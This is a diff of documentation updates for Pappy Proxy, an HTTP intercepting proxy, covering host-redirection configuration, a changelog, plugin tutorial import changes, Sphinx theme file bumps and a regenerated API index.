requests host header. forward\_host\_ssl does the same thing, but it
listens for SSL connections and forces the connection to use SSL.
Or if youre going to YOLO it do the same thing then listen on port
80/443 directly. I do not suggest you do this.
::
"proxy_listeners": [
{"port": 80, "interface": "127.0.0.1", "forward_host": "www.example.faketld"},
{"port": 443, "interface": "127.0.0.1", "forward_host_ssl": "www.example.faketld"},
]
Pappy will automatically use this host to make the connection and
forward the request to the new server.
FAQ
---
@ -1175,11 +1534,87 @@ saved to disk. In between the time when a request is decoded and when
it's saved to disk, it will have an ID of ``--``. So just wait a little
bit and it will get an ID you can use.
Boring, Technical Stuff
-----------------------
I do some stuff to try and keep speed and memory usage to reasonable
levels. Unfortunately, things might seem slow in some areas. This is
where I try and explain why those exist. Honestly, you probably don't
care about this, but I'd rather have it written down and have nobody
read it than just leave people in the dark.
Request Cache / Memory usage
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
For performance reasons, Pappy by default will not store every request
in memory. The cache will store a certain number of the most recently
accessed requests in memory. This means that if you go through all of
history, it could be slow (for example running ``ls a`` or ``sm``). If
you have enough RAM to keep everything in memory, you can set the
request cache size to -1 to just keep everything in memory. However,
even if the cache size is unlimited, it still won't load a request into
memory untill you access it. So if you want to load everything in
memory, run ``ls a``.
By default, Pappy will cache 2000 requests. This is kind of heavy, but
it's assumed you're doing testing on a reasonably specced laptop.
Personally, I live on the edge and use -1 until I run into memory
issues.
Changelog
---------
The boring part of the readme
- 0.2.7
- boring unit tests
- should make future releases more stable I guess
- Support for upstream SOCKS servers
- ``print_params`` command
- ``inv`` filter
- ``param_info`` command
- Filters by request/response only headers/body
- Transparent host redirection
- Some easier to type aliases for common commands
- 0.2.6
- Fix pip being dumb
- ``watch`` command to watch requests/responses in real time
- Added ``pp[qs] form <id>`` to print POST data
- Bugfixes
- 0.2.5
- Requests sent with repeater now are given ``repeater`` tag
- Add ppq and pps commands
- Look at the pretty prompt
- Bugfixes
- 0.2.4
- Add command history saving between sessions
- Add html encoder/decoder
- All the bugs were fixed so I added some more for 0.2.5
- 0.2.3
- Decoder functions
- Add ``merge`` command
- Bugfixes
- 0.2.2
- COLORS
- Performance improvements
- Bugfixes (duh)
- 0.2.1
- Improve memory usage
- Tweaked plugin API
- 0.2.0
- Lots of refactoring

15
docs/build/html/_sources/pappyplugins.txt vendored
View file

@ -272,10 +272,10 @@ Using defer.inlineCallbacks With a Command
.. note::
This tutorial won't tell you how to use inlineCallbacks in general. Type "twisted inline callbacks" into google to figure out what they are. This is mainly just a reminder to use the ``crochet`` wrapper for console commands and warning you that some functions may return deferreds that you may have to deal with.
Since you're writing a plugin, you'll probably be using functions which return a deferred. And to keep things readable, you'll want to use the ``defer.inlineCallbacks`` function wrapper. Unfortunately, you can't bind async functions to commands. Luckily, there's a library called `crochet <https://pypi.python.org/pypi/crochet>`_ which lets you add another wrapper to the function that lets it be used like a blocking function. Rather than talking about it, let's write a plugin to call :func:`pappyproxy.console.load_reqlist` to print out some requests' hosts. Let's start by pretending it's a normal function::
Since you're writing a plugin, you'll probably be using functions which return a deferred. And to keep things readable, you'll want to use the ``defer.inlineCallbacks`` function wrapper. Unfortunately, you can't bind async functions to commands. Luckily, there's a library called `crochet <https://pypi.python.org/pypi/crochet>`_ which lets you add another wrapper to the function that lets it be used like a blocking function. Rather than talking about it, let's write a plugin to call :func:`pappyproxy.util.load_reqlist` to print out some requests' hosts. Let's start by pretending it's a normal function::
import shlex
from pappyproxy.console import load_reqlist
from pappyproxy.util import load_reqlist
def print_hosts(line):
args = shlex.split(line)
@ -309,10 +309,10 @@ And we run it::
iteration over non-sequence
pappy>
Iteration over a non-sequence? what? Well, :func:`pappyproxy.console.load_reqlist` doesn't actually return a list of requests. It returns a deferred which returns a list of requests. I'm not going into the details (look up some stuff on using inline callbacks with Twisted if you want more info), but the way to fix it is to slap an ``inlineCallbacks`` wrapper on the function and ``yield`` the result of the function. Now it looks like this::
Iteration over a non-sequence? what? Well, :func:`pappyproxy.util.load_reqlist` doesn't actually return a list of requests. It returns a deferred which returns a list of requests. I'm not going into the details (look up some stuff on using inline callbacks with Twisted if you want more info), but the way to fix it is to slap an ``inlineCallbacks`` wrapper on the function and ``yield`` the result of the function. Now it looks like this::
import shlex
from pappyproxy.console import load_reqlist
from pappyproxy.util import load_reqlist
from twisted.internet import defer
@defer.inlineCallbacks
@ -336,7 +336,7 @@ However, the console assumes that any functions it calls will be blocking. As a
import shlex
import crochet
from pappyproxy.console import load_reqlist
from pappyproxy.util import load_reqlist
from twisted.internet import defer
@crochet.wait_for(timeout=None)
@ -394,7 +394,7 @@ Here is an example plugin for storing the user-agent (if it exists) in the ``plu
import shlex
from twisted.internet import defer
from pappyproxy.console import load_reqlist
from pappyproxy.util import load_reqlist
from pappyproxy.plugin import main_context
from pappyproxy.util import PappyException
@ -435,8 +435,7 @@ Here is an example plugin for storing the user-agent (if it exists) in the ``plu
Useful Functions
----------------
* Load a request by id: :func:`pappyproxy.http.Request.load_request`
* Create a filter from a filter string: :func:`pappyproxy.context.Filter.from_filter_string`
See :mod:`pappyproxy.plugin` and :mod:`pappyproxy.util` for useful functions
Built In Plugins As Examples
============================

2
docs/build/html/_static/basic.css vendored
View file

@ -4,7 +4,7 @@
*
* Sphinx stylesheet -- basic theme.
*
* :copyright: Copyright 2007-2015 by the Sphinx team, see AUTHORS.
* :copyright: Copyright 2007-2016 by the Sphinx team, see AUTHORS.
* :license: BSD, see LICENSE for details.
*
*/

4
docs/build/html/_static/classic.css vendored
View file

@ -4,7 +4,7 @@
*
* Sphinx stylesheet -- default theme.
*
* :copyright: Copyright 2007-2015 by the Sphinx team, see AUTHORS.
* :copyright: Copyright 2007-2016 by the Sphinx team, see AUTHORS.
* :license: BSD, see LICENSE for details.
*
*/
@ -169,7 +169,7 @@ a.headerlink:hover {
color: white;
}
div.body p, div.body dd, div.body li {
div.body p, div.body dd, div.body li, div.body blockquote {
text-align: justify;
line-height: 130%;
}

28
docs/build/html/_static/doctools.js vendored
View file

@ -4,7 +4,7 @@
*
* Sphinx JavaScript utilities for all documentation.
*
* :copyright: Copyright 2007-2015 by the Sphinx team, see AUTHORS.
* :copyright: Copyright 2007-2016 by the Sphinx team, see AUTHORS.
* :license: BSD, see LICENSE for details.
*
*/
@ -124,6 +124,7 @@ var Documentation = {
this.fixFirefoxAnchorBug();
this.highlightSearchWords();
this.initIndexTable();
},
/**
@ -252,6 +253,29 @@ var Documentation = {
});
var url = parts.join('/');
return path.substring(url.lastIndexOf('/') + 1, path.length - 1);
},
initOnKeyListeners: function() {
$(document).keyup(function(event) {
var activeElementType = document.activeElement.tagName;
// don't navigate when in search box or textarea
if (activeElementType !== 'TEXTAREA' && activeElementType !== 'INPUT' && activeElementType !== 'SELECT') {
switch (event.keyCode) {
case 37: // left
var prevHref = $('link[rel="prev"]').prop('href');
if (prevHref) {
window.location.href = prevHref;
return false;
}
case 39: // right
var nextHref = $('link[rel="next"]').prop('href');
if (nextHref) {
window.location.href = nextHref;
return false;
}
}
}
});
}
};
@ -260,4 +284,4 @@ _ = Documentation.gettext;
$(document).ready(function() {
Documentation.init();
});
});

2
docs/build/html/_static/pygments.css vendored
View file

@ -4,8 +4,10 @@
.highlight .err { border: 1px solid #FF0000 } /* Error */
.highlight .k { color: #007020; font-weight: bold } /* Keyword */
.highlight .o { color: #666666 } /* Operator */
.highlight .ch { color: #408090; font-style: italic } /* Comment.Hashbang */
.highlight .cm { color: #408090; font-style: italic } /* Comment.Multiline */
.highlight .cp { color: #007020 } /* Comment.Preproc */
.highlight .cpf { color: #408090; font-style: italic } /* Comment.PreprocFile */
.highlight .c1 { color: #408090; font-style: italic } /* Comment.Single */
.highlight .cs { color: #408090; background-color: #fff0f0 } /* Comment.Special */
.highlight .gd { color: #A00000 } /* Generic.Deleted */

2
docs/build/html/_static/searchtools.js vendored
View file

@ -4,7 +4,7 @@
*
* Sphinx JavaScript utilties for the full-text search.
*
* :copyright: Copyright 2007-2015 by the Sphinx team, see AUTHORS.
* :copyright: Copyright 2007-2016 by the Sphinx team, see AUTHORS.
* :license: BSD, see LICENSE for details.
*
*/

2
docs/build/html/_static/sidebar.js vendored
View file

@ -16,7 +16,7 @@
* Once the browser is closed the cookie is deleted and the position
* reset to the default (expanded).
*
* :copyright: Copyright 2007-2015 by the Sphinx team, see AUTHORS.
* :copyright: Copyright 2007-2016 by the Sphinx team, see AUTHORS.
* :license: BSD, see LICENSE for details.
*
*/

2
docs/build/html/_static/websupport.js vendored
View file

@ -4,7 +4,7 @@
*
* sphinx.websupport utilties for all documentation.
*
* :copyright: Copyright 2007-2015 by the Sphinx team, see AUTHORS.
* :copyright: Copyright 2007-2016 by the Sphinx team, see AUTHORS.
* :license: BSD, see LICENSE for details.
*
*/

280
docs/build/html/genindex.html vendored
View file

@ -7,7 +7,7 @@
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Index &mdash; Pappy Proxy 0.2.0 documentation</title>
<title>Index &mdash; Pappy Proxy 0.2.11 documentation</title>
<link rel="stylesheet" href="_static/classic.css" type="text/css" />
<link rel="stylesheet" href="_static/pygments.css" type="text/css" />
@ -15,7 +15,7 @@
<script type="text/javascript">
var DOCUMENTATION_OPTIONS = {
URL_ROOT: './',
VERSION: '0.2.0',
VERSION: '0.2.11',
COLLAPSE_INDEX: false,
FILE_SUFFIX: '.html',
HAS_SOURCE: true
@ -24,7 +24,7 @@
<script type="text/javascript" src="_static/jquery.js"></script>
<script type="text/javascript" src="_static/underscore.js"></script>
<script type="text/javascript" src="_static/doctools.js"></script>
<link rel="top" title="Pappy Proxy 0.2.0 documentation" href="index.html" />
<link rel="top" title="Pappy Proxy 0.2.11 documentation" href="index.html" />
</head>
<body role="document">
<div class="related" role="navigation" aria-label="related navigation">
@ -36,7 +36,7 @@
<li class="right" >
<a href="py-modindex.html" title="Python Module Index"
>modules</a> |</li>
<li class="nav-item nav-item-0"><a href="index.html">Pappy Proxy 0.2.0 documentation</a> &raquo;</li>
<li class="nav-item nav-item-0"><a href="index.html">Pappy Proxy 0.2.11 documentation</a> &raquo;</li>
</ul>
</div>
@ -106,27 +106,15 @@
</dt>
<dt><a href="pappyproxy.html#pappyproxy.plugin.add_req">add_req() (in module pappyproxy.plugin)</a>
</dt>
</dl></td>
<td style="width: 33%" valign="top"><dl>
<dt><a href="pappyproxy.html#pappyproxy.context.Context.add_request">add_request() (pappyproxy.context.Context method)</a>
<dt><a href="pappyproxy.html#pappyproxy.plugin.add_to_history">add_to_history() (in module pappyproxy.plugin)</a>
</dt>
<dt><a href="pappyproxy.html#pappyproxy.http.RepeatableDict.all_pairs">all_pairs() (pappyproxy.http.RepeatableDict method)</a>
</dt>
<dt><a href="pappyproxy.html#pappyproxy.context.Context.all_reqs">all_reqs (pappyproxy.context.Context attribute)</a>
</dt>
<dt><a href="pappyproxy.html#pappyproxy.plugin.all_reqs">all_reqs() (in module pappyproxy.plugin)</a>
</dt>
</dl></td>
<td style="width: 33%" valign="top"><dl>
<dt><a href="pappyproxy.html#pappyproxy.http.RepeatableDict.all_vals">all_vals() (pappyproxy.http.RepeatableDict method)</a>
</dt>
@ -136,10 +124,22 @@
</dt>
<dt><a href="pappyproxy.html#pappyproxy.session.Session.apply_req">apply_req() (pappyproxy.session.Session method)</a>
</dt>
<dt><a href="pappyproxy.html#pappyproxy.session.Session.apply_rsp">apply_rsp() (pappyproxy.session.Session method)</a>
</dt>
<dt><a href="pappyproxy.html#pappyproxy.http.Request.async_deep_save">async_deep_save() (pappyproxy.http.Request method)</a>
</dt>
<dt><a href="pappyproxy.html#pappyproxy.plugin.async_main_context_ids">async_main_context_ids() (in module pappyproxy.plugin)</a>
</dt>
<dt><a href="pappyproxy.html#pappyproxy.http.Request.async_save">async_save() (pappyproxy.http.Request method)</a>
</dt>
@ -157,6 +157,10 @@
<dt><a href="pappyproxy.html#pappyproxy.http.Request.async_submit">async_submit() (pappyproxy.http.Request method)</a>
</dt>
<dt><a href="pappyproxy.html#pappyproxy.http.async_submit_requests">async_submit_requests() (in module pappyproxy.http)</a>
</dt>
</dl></td>
</tr></table>
@ -167,10 +171,6 @@
<dt><a href="pappyproxy.html#pappyproxy.http.HTTPMessage.body">body (pappyproxy.http.HTTPMessage attribute)</a>
</dt>
<dt><a href="pappyproxy.html#pappyproxy.http.HTTPMessage.body_complete">body_complete() (pappyproxy.http.HTTPMessage method)</a>
</dt>
</dl></td>
<td style="width: 33%" valign="top"><dl>
@ -184,13 +184,19 @@
<table style="width: 100%" class="indextable genindextable"><tr>
<td style="width: 33%" valign="top"><dl>
<dt><a href="pappyproxy.html#pappyproxy.config.CERT_DIR">CERT_DIR (in module pappyproxy.config)</a>
<dt><a href="pappyproxy.html#pappyproxy.http.Request.cache">cache (pappyproxy.http.Request attribute)</a>
</dt>
<dt><a href="pappyproxy.html#pappyproxy.http.RepeatableDict.clear">clear() (pappyproxy.http.RepeatableDict method)</a>
<dt><a href="pappyproxy.html#pappyproxy.http.HTTPMessage.clear">clear() (pappyproxy.http.HTTPMessage method)</a>
</dt>
<dd><dl>
<dt><a href="pappyproxy.html#pappyproxy.http.RepeatableDict.clear">(pappyproxy.http.RepeatableDict method)</a>
</dt>
</dl></dd>
<dt><a href="pappyproxy.html#pappyproxy.iter.common_passwords">common_passwords() (in module pappyproxy.iter)</a>
</dt>
@ -199,10 +205,14 @@
<dt><a href="pappyproxy.html#pappyproxy.iter.common_usernames">common_usernames() (in module pappyproxy.iter)</a>
</dt>
<dt><a href="pappyproxy.html#pappyproxy.util.confirm">confirm() (in module pappyproxy.util)</a>
</dt>
</dl></td>
<td style="width: 33%" valign="top"><dl>
<dt><a href="pappyproxy.html#pappyproxy.console.confirm">confirm() (in module pappyproxy.console)</a>
<dt><a href="pappyproxy.html#pappyproxy.http.Request.connect_request">connect_request (pappyproxy.http.Request attribute)</a>
</dt>
@ -224,24 +234,12 @@
<table style="width: 100%" class="indextable genindextable"><tr>
<td style="width: 33%" valign="top"><dl>
<dt><a href="pappyproxy.html#pappyproxy.config.DATA_DIR">DATA_DIR (in module pappyproxy.config)</a>
</dt>
<dt><a href="pappyproxy.html#pappyproxy.config.DATAFILE">DATAFILE (in module pappyproxy.config)</a>
</dt>
<dt><a href="pappyproxy.html#pappyproxy.config.DEBUG_DIR">DEBUG_DIR (in module pappyproxy.config)</a>
<dt><a href="pappyproxy.html#pappyproxy.http.Request.deep_delete">deep_delete() (pappyproxy.http.Request method)</a>
</dt>
</dl></td>
<td style="width: 33%" valign="top"><dl>
<dt><a href="pappyproxy.html#pappyproxy.http.Request.deep_delete">deep_delete() (pappyproxy.http.Request method)</a>
</dt>
<dt><a href="pappyproxy.html#pappyproxy.http.Response.delete_cookie">delete_cookie() (pappyproxy.http.Response method)</a>
</dt>
@ -316,7 +314,15 @@
<table style="width: 100%" class="indextable genindextable"><tr>
<td style="width: 33%" valign="top"><dl>
<dt><a href="pappyproxy.html#pappyproxy.http.HTTPMessage.get_metadata">get_metadata() (pappyproxy.http.HTTPMessage method)</a>
<dt><a href="pappyproxy.html#pappyproxy.session.Session.get_cookie">get_cookie() (pappyproxy.session.Session method)</a>
</dt>
<dt><a href="pappyproxy.html#pappyproxy.http.Request.get_plugin_dict">get_plugin_dict() (pappyproxy.http.Request method)</a>
</dt>
<dt><a href="pappyproxy.html#pappyproxy.util.get_req_data_row">get_req_data_row() (in module pappyproxy.util)</a>
</dt>
</dl></td>
@ -325,6 +331,10 @@
<dt><a href="pappyproxy.html#pappyproxy.http.get_request">get_request() (in module pappyproxy.http)</a>
</dt>
<dt><a href="pappyproxy.html#pappyproxy.session.Session.get_rsp_cookie">get_rsp_cookie() (pappyproxy.session.Session method)</a>
</dt>
</dl></td>
</tr></table>
@ -332,27 +342,15 @@
<table style="width: 100%" class="indextable genindextable"><tr>
<td style="width: 33%" valign="top"><dl>
<dt><a href="pappyproxy.html#pappyproxy.http.HTTPMessage.handle_header">handle_header() (pappyproxy.http.HTTPMessage method)</a>
</dt>
<dt><a href="pappyproxy.html#pappyproxy.http.HTTPMessage.handle_start_line">handle_start_line() (pappyproxy.http.HTTPMessage method)</a>
</dt>
<dt><a href="pappyproxy.html#pappyproxy.http.HTTPMessage.headers_end">headers_end() (pappyproxy.http.HTTPMessage method)</a>
</dt>
<dt><a href="pappyproxy.html#pappyproxy.http.HTTPMessage.headers_section">headers_section (pappyproxy.http.HTTPMessage attribute)</a>
</dt>
</dl></td>
<td style="width: 33%" valign="top"><dl>
<dt><a href="pappyproxy.html#pappyproxy.http.HTTPMessage.headers_section_pretty">headers_section_pretty (pappyproxy.http.HTTPMessage attribute)</a>
</dt>
</dl></td>
<td style="width: 33%" valign="top"><dl>
<dt><a href="pappyproxy.html#pappyproxy.http.Request.host">host (pappyproxy.http.Request attribute)</a>
</dt>
@ -372,10 +370,6 @@
</dt>
<dt><a href="pappyproxy.html#pappyproxy.context.Context.in_memory_requests">in_memory_requests (pappyproxy.context.Context attribute)</a>
</dt>
<dt><a href="pappyproxy.html#pappyproxy.http.init">init() (in module pappyproxy.http)</a>
</dt>
@ -396,25 +390,25 @@
<table style="width: 100%" class="indextable genindextable"><tr>
<td style="width: 33%" valign="top"><dl>
<dt><a href="pappyproxy.html#pappyproxy.http.Request.load_all_requests">load_all_requests() (pappyproxy.http.Request static method)</a>
</dt>
<dt><a href="pappyproxy.html#pappyproxy.macros.load_macros">load_macros() (in module pappyproxy.macros)</a>
</dt>
<dt><a href="pappyproxy.html#pappyproxy.console.load_reqlist">load_reqlist() (in module pappyproxy.console)</a>
<dt><a href="pappyproxy.html#pappyproxy.util.load_reqlist">load_reqlist() (in module pappyproxy.util)</a>
</dt>
<dt><a href="pappyproxy.html#pappyproxy.http.Request.load_request">load_request() (pappyproxy.http.Request static method)</a>
</dt>
</dl></td>
<td style="width: 33%" valign="top"><dl>
<dt><a href="pappyproxy.html#pappyproxy.http.Request.load_request">load_request() (pappyproxy.http.Request static method)</a>
<dt><a href="pappyproxy.html#pappyproxy.http.Request.load_requests_by_tag">load_requests_by_tag() (pappyproxy.http.Request static method)</a>
</dt>
<dt><a href="pappyproxy.html#pappyproxy.http.Request.load_requests_by_tag">load_requests_by_tag() (pappyproxy.http.Request static method)</a>
<dt><a href="pappyproxy.html#pappyproxy.http.Request.load_requests_by_time">load_requests_by_time() (pappyproxy.http.Request static method)</a>
</dt>
@ -431,10 +425,18 @@
<dt><a href="pappyproxy.html#pappyproxy.macros.Macro">Macro (class in pappyproxy.macros)</a>
</dt>
<dt><a href="pappyproxy.html#pappyproxy.plugin.main_context_ids">main_context_ids() (in module pappyproxy.plugin)</a>
</dt>
</dl></td>
<td style="width: 33%" valign="top"><dl>
<dt><a href="pappyproxy.html#pappyproxy.plugin.main_context">main_context() (in module pappyproxy.plugin)</a>
<dt><a href="pappyproxy.html#pappyproxy.macros.mangle_request">mangle_request() (in module pappyproxy.macros)</a>
</dt>
<dt><a href="pappyproxy.html#pappyproxy.macros.mangle_response">mangle_response() (in module pappyproxy.macros)</a>
</dt>
</dl></td>
@ -444,7 +446,75 @@
<table style="width: 100%" class="indextable genindextable"><tr>
<td style="width: 33%" valign="top"><dl>
<dt><a href="pappyproxy.html#pappyproxy.config.PAPPY_DIR">PAPPY_DIR (in module pappyproxy.config)</a>
<dt><a href="pappyproxy.html#pappyproxy.config.PappyConfig">PappyConfig (class in pappyproxy.config)</a>
</dt>
<dt><a href="pappyproxy.html#pappyproxy.config.PappyConfig.archive">PappyConfig.archive (in module pappyproxy.config)</a>
</dt>
<dt><a href="pappyproxy.html#pappyproxy.config.PappyConfig.cert_dir">PappyConfig.cert_dir (in module pappyproxy.config)</a>
</dt>
<dt><a href="pappyproxy.html#pappyproxy.config.PappyConfig.config_dict">PappyConfig.config_dict (in module pappyproxy.config)</a>
</dt>
<dt><a href="pappyproxy.html#pappyproxy.config.PappyConfig.crypt_dir">PappyConfig.crypt_dir (in module pappyproxy.config)</a>
</dt>
<dt><a href="pappyproxy.html#pappyproxy.config.PappyConfig.crypt_file">PappyConfig.crypt_file (in module pappyproxy.config)</a>
</dt>
<dt><a href="pappyproxy.html#pappyproxy.config.PappyConfig.crypt_session">PappyConfig.crypt_session (in module pappyproxy.config)</a>
</dt>
<dt><a href="pappyproxy.html#pappyproxy.config.PappyConfig.data_dir">PappyConfig.data_dir (in module pappyproxy.config)</a>
</dt>
<dt><a href="pappyproxy.html#pappyproxy.config.PappyConfig.datafile">PappyConfig.datafile (in module pappyproxy.config)</a>
</dt>
<dt><a href="pappyproxy.html#pappyproxy.config.PappyConfig.debug_dir">PappyConfig.debug_dir (in module pappyproxy.config)</a>
</dt>
<dt><a href="pappyproxy.html#pappyproxy.config.PappyConfig.global_config_dict">PappyConfig.global_config_dict (in module pappyproxy.config)</a>
</dt>
<dt><a href="pappyproxy.html#pappyproxy.config.PappyConfig.http_proxy">PappyConfig.http_proxy (in module pappyproxy.config)</a>
</dt>
<dt><a href="pappyproxy.html#pappyproxy.config.PappyConfig.listeners">PappyConfig.listeners (in module pappyproxy.config)</a>
</dt>
<dt><a href="pappyproxy.html#pappyproxy.config.PappyConfig.pappy_dir">PappyConfig.pappy_dir (in module pappyproxy.config)</a>
</dt>
<dt><a href="pappyproxy.html#pappyproxy.config.PappyConfig.plugin_dirs">PappyConfig.plugin_dirs (in module pappyproxy.config)</a>
</dt>
<dt><a href="pappyproxy.html#pappyproxy.config.PappyConfig.salt_len">PappyConfig.salt_len (in module pappyproxy.config)</a>
</dt>
<dt><a href="pappyproxy.html#pappyproxy.config.PappyConfig.save_history">PappyConfig.save_history (in module pappyproxy.config)</a>
</dt>
<dt><a href="pappyproxy.html#pappyproxy.config.PappyConfig.socks_proxy">PappyConfig.socks_proxy (in module pappyproxy.config)</a>
</dt>
@ -463,6 +533,8 @@
<dt><a href="pappyproxy.html#module-pappyproxy.config">pappyproxy.config (module)</a>
</dt>
</dl></td>
<td style="width: 33%" valign="top"><dl>
<dt><a href="pappyproxy.html#module-pappyproxy.console">pappyproxy.console (module)</a>
</dt>
@ -491,8 +563,6 @@
<dt><a href="pappyproxy.html#module-pappyproxy.plugin">pappyproxy.plugin (module)</a>
</dt>
</dl></td>
<td style="width: 33%" valign="top"><dl>
<dt><a href="pappyproxy.html#module-pappyproxy.proxy">pappyproxy.proxy (module)</a>
</dt>
@ -510,6 +580,10 @@
</dt>
<dt><a href="pappyproxy.html#pappyproxy.pappy.PappySession">PappySession (class in pappyproxy.pappy)</a>
</dt>
<dt><a href="pappyproxy.html#pappyproxy.http.Request.path_tuple">path_tuple (pappyproxy.http.Request attribute)</a>
</dt>
@ -522,11 +596,15 @@
</dt>
<dt><a href="pappyproxy.html#pappyproxy.console.print_requests">print_requests() (in module pappyproxy.console)</a>
<dt><a href="pappyproxy.html#pappyproxy.util.print_request_rows">print_request_rows() (in module pappyproxy.util)</a>
</dt>
<dt><a href="pappyproxy.html#pappyproxy.console.print_table">print_table() (in module pappyproxy.console)</a>
<dt><a href="pappyproxy.html#pappyproxy.util.print_requests">print_requests() (in module pappyproxy.util)</a>
</dt>
<dt><a href="pappyproxy.html#pappyproxy.util.print_table">print_table() (in module pappyproxy.util)</a>
</dt>
@ -534,6 +612,10 @@
</dt>
<dt><a href="pappyproxy.html#pappyproxy.http.Request.proxy_creds">proxy_creds (pappyproxy.http.Request attribute)</a>
</dt>
<dt><a href="pappyproxy.html#pappyproxy.console.ProxyCmd">ProxyCmd (class in pappyproxy.console)</a>
</dt>
@ -568,11 +650,11 @@
</dt>
<dt><a href="pappyproxy.html#pappyproxy.context.Context.remove_request">remove_request() (pappyproxy.context.Context static method)</a>
<dt><a href="pappyproxy.html#pappyproxy.http.RepeatableDict">RepeatableDict (class in pappyproxy.http)</a>
</dt>
<dt><a href="pappyproxy.html#pappyproxy.http.RepeatableDict">RepeatableDict (class in pappyproxy.http)</a>
<dt><a href="pappyproxy.html#pappyproxy.plugin.req_history">req_history() (in module pappyproxy.plugin)</a>
</dt>
@ -582,11 +664,11 @@
</dl></td>
<td style="width: 33%" valign="top"><dl>
<dt><a href="pappyproxy.html#pappyproxy.http.HTTPMessage.reserved_meta_keys">reserved_meta_keys (pappyproxy.http.HTTPMessage attribute)</a>
<dt><a href="pappyproxy.html#pappyproxy.plugin.require_modules">require_modules() (in module pappyproxy.plugin)</a>
</dt>
<dt><a href="pappyproxy.html#pappyproxy.http.HTTPMessage.reset_metadata">reset_metadata() (pappyproxy.http.HTTPMessage method)</a>
<dt><a href="pappyproxy.html#pappyproxy.http.HTTPMessage.reserved_meta_keys">reserved_meta_keys (pappyproxy.http.HTTPMessage attribute)</a>
</dt>
@ -616,10 +698,26 @@
</dt>
<dt><a href="pappyproxy.html#pappyproxy.session.Session.save_req">save_req() (pappyproxy.session.Session method)</a>
</dt>
<dt><a href="pappyproxy.html#pappyproxy.session.Session.save_rsp">save_rsp() (pappyproxy.session.Session method)</a>
</dt>
<dt><a href="pappyproxy.html#pappyproxy.http.Request.saved">saved (pappyproxy.http.Request attribute)</a>
</dt>
<dt><a href="pappyproxy.html#pappyproxy.session.Session">Session (class in pappyproxy.session)</a>
</dt>
<dt><a href="pappyproxy.html#pappyproxy.pappy.session">session (in module pappyproxy.pappy)</a>
</dt>
<dt><a href="pappyproxy.html#pappyproxy.console.ProxyCmd.set_cmd">set_cmd() (pappyproxy.console.ProxyCmd method)</a>
</dt>
@ -631,21 +729,23 @@
<dt><a href="pappyproxy.html#pappyproxy.http.Response.set_cookie">set_cookie() (pappyproxy.http.Response method)</a>
</dt>
<dd><dl>
<dt><a href="pappyproxy.html#pappyproxy.session.Session.set_cookie">(pappyproxy.session.Session method)</a>
</dt>
</dl></dd>
<dt><a href="pappyproxy.html#pappyproxy.http.Response.set_cookie_kv">set_cookie_kv() (pappyproxy.http.Response method)</a>
</dt>
</dl></td>
<td style="width: 33%" valign="top"><dl>
<dt><a href="pappyproxy.html#pappyproxy.context.Context.set_filters">set_filters() (pappyproxy.context.Context method)</a>
</dt>
<dt><a href="pappyproxy.html#pappyproxy.http.HTTPMessage.set_metadata">set_metadata() (pappyproxy.http.HTTPMessage method)</a>
</dt>
</dl></td>
<td style="width: 33%" valign="top"><dl>
<dt><a href="pappyproxy.html#pappyproxy.context.set_tag">set_tag() (in module pappyproxy.context)</a>
</dt>
@ -658,6 +758,10 @@
</dt>
<dt><a href="pappyproxy.html#pappyproxy.http.Request.sort_time">sort_time (pappyproxy.http.Request attribute)</a>
</dt>
<dt><a href="pappyproxy.html#pappyproxy.http.Response.soup">soup (pappyproxy.http.Response attribute)</a>
</dt>
@ -680,7 +784,7 @@
</dt>
<dt><a href="pappyproxy.html#pappyproxy.http.Request.submit_new">submit_new() (pappyproxy.http.Request static method)</a>
<dt><a href="pappyproxy.html#pappyproxy.http.Request.submit_request">submit_request() (pappyproxy.http.Request static method)</a>
</dt>
</dl></td>
@ -700,17 +804,13 @@
<table style="width: 100%" class="indextable genindextable"><tr>
<td style="width: 33%" valign="top"><dl>
<dt><a href="pappyproxy.html#pappyproxy.http.HTTPMessage.update_from_body">update_from_body() (pappyproxy.http.HTTPMessage method)</a>
</dt>
<dt><a href="pappyproxy.html#pappyproxy.http.HTTPMessage.update_from_headers">update_from_headers() (pappyproxy.http.HTTPMessage method)</a>
<dt><a href="pappyproxy.html#pappyproxy.http.Request.url">url (pappyproxy.http.Request attribute)</a>
</dt>
</dl></td>
<td style="width: 33%" valign="top"><dl>
<dt><a href="pappyproxy.html#pappyproxy.http.Request.url">url (pappyproxy.http.Request attribute)</a>
<dt><a href="pappyproxy.html#pappyproxy.http.Request.url_color">url_color (pappyproxy.http.Request attribute)</a>
</dt>
</dl></td>
@ -752,12 +852,12 @@
<li class="right" >
<a href="py-modindex.html" title="Python Module Index"
>modules</a> |</li>
<li class="nav-item nav-item-0"><a href="index.html">Pappy Proxy 0.2.0 documentation</a> &raquo;</li>
<li class="nav-item nav-item-0"><a href="index.html">Pappy Proxy 0.2.11 documentation</a> &raquo;</li>
</ul>
</div>
<div class="footer" role="contentinfo">
&copy; Copyright 2015, Rob Glew.
Created using <a href="http://sphinx-doc.org/">Sphinx</a> 1.3.3.
Created using <a href="http://sphinx-doc.org/">Sphinx</a> 1.3.6.
</div>
</body>
</html>

23
docs/build/html/index.html vendored
View file

@ -6,7 +6,7 @@
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Welcome to Pappy Proxys documentation! &mdash; Pappy Proxy 0.2.0 documentation</title>
<title>Welcome to Pappy Proxys documentation! &mdash; Pappy Proxy 0.2.11 documentation</title>
<link rel="stylesheet" href="_static/classic.css" type="text/css" />
<link rel="stylesheet" href="_static/pygments.css" type="text/css" />
@ -14,7 +14,7 @@
<script type="text/javascript">
var DOCUMENTATION_OPTIONS = {
URL_ROOT: './',
VERSION: '0.2.0',
VERSION: '0.2.11',
COLLAPSE_INDEX: false,
FILE_SUFFIX: '.html',
HAS_SOURCE: true
@ -23,7 +23,7 @@
<script type="text/javascript" src="_static/jquery.js"></script>
<script type="text/javascript" src="_static/underscore.js"></script>
<script type="text/javascript" src="_static/doctools.js"></script>
<link rel="top" title="Pappy Proxy 0.2.0 documentation" href="#" />
<link rel="top" title="Pappy Proxy 0.2.11 documentation" href="#" />
<link rel="next" title="The Pappy Proxy" href="overview.html" />
</head>
<body role="document">
@ -39,7 +39,7 @@
<li class="right" >
<a href="overview.html" title="The Pappy Proxy"
accesskey="N">next</a> |</li>
<li class="nav-item nav-item-0"><a href="#">Pappy Proxy 0.2.0 documentation</a> &raquo;</li>
<li class="nav-item nav-item-0"><a href="#">Pappy Proxy 0.2.11 documentation</a> &raquo;</li>
</ul>
</div>
@ -64,6 +64,7 @@
